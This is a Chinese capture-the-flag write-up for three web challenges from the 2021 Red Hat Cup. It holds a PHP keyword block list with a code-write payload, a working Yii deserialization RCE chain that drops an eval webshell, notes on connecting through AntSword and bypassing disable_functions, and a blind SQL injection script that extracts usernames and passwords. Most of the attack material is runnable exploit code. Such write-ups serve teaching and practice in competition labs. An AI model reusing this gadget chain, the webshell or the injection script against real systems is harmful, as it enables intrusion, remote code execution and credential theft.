2021红帽杯 writeup

Web

find_it

dirsearch扫到个robots.txt,里面放着1ndexx.php

直接访问没有东西,查看swp文件.1ndexx.php.swp拿到源码

<?php

#Really easy...

$file=fopen("flag.php","r") or die("Unable 2 open!");

$I_know_you_wanna_but_i_will_not_give_you_hhh = fread($file,filesize("flag.php"));

$hack=fopen("hack.php","w") or die("Unable 2 open");

$a=$_GET['code'];

if(preg_match('/system|eval|exec|base|compress|chr|ord|str|replace|pack|assert|preg|replace|create|function|call|\~|\^|\`|flag|cat|tac|more|tail|echo|require|include|proc|open|read|shell|file|put|get|contents|dir|link|dl|var|dump/',$a)){
    die("you die");
}
if(strlen($a)>33){
    die("nonono.");
}
fwrite($hack,$a);
fwrite($hack,$I_know_you_wanna_but_i_will_not_give_you_hhh);

fclose($file);
fclose($hack);
?>

payload

http://eci-2zegg15ya7y4this8qz2.cloudeci1.ichunqiu.com/index.php?code=%3C?php%20phpinfo();

访问hack.php,flag在环境变量里

framework

yii反序列化rce,源码在www.zip,改一下链子就行了

https://xz.aliyun.com/t/8307

<?php
namespace yii\rest{
    class CreateAction{
        public $checkAccess;
        public $id;
        public function __construct(){
            $this->checkAccess = 'assert';
            $this->id = 'file_put_contents("shell.php","<?php eval(\$_POST[pass]);");';
        }
    }
}

namespace Faker{
    use yii\rest\CreateAction;

    class Generator{
        protected $formatters;

        public function __construct(){
            $this->formatters['close'] = [new CreateAction(), 'run'];
        }
    }
}

namespace yii\db{
    use Faker\Generator;

    class BatchQueryResult{
        private $_dataReader;

        public function __construct(){
            $this->_dataReader = new Generator;
        }
    }
}
namespace{
    echo base64_encode(serialize(new yii\db\BatchQueryResult));
}
?>

蚁剑连接http://eci-2ze3l5mg59msjyj8xpg5.cloudeci1.ichunqiu.com/shell.php

蚁剑插件bypass disable_function

WebsiteManger

image.php?id=3处存在注入,手测结果为image.php?id=3/**/or/**/1=1

盲注脚本

import requests

url = 'http://eci-2ze56uon9iidfu8xxa70.cloudeci1.ichunqiu.com/image.php?id=3/**/or/**/1='

def main():
    result = ""
    for i in range(1, 200):
        low = 32
        high = 128
        while low < high:
            mid = int((low + high) / 2)
            content = "select/**/group_concat(username,':',password)/**/from/**/users"
            # content = "select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database()"
            # content = "select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name='users'" 
            sql = f"if(ascii(substr(({content}),{i},1))<{mid},1,2)"
            url2 = url+sql
            r = requests.get(url2)
            if len(r.content) == 50811:
                high = mid
            else:
                low = mid + 1
        if low == high == 32:
            print(result)
            break
        result += chr(int((high + low - 1) / 2))
        print(result)
        #admin:1288a7689e3c735652a72

if __name__ == '__main__':
    main()

登录上去之后有个curl,用file协议读取flag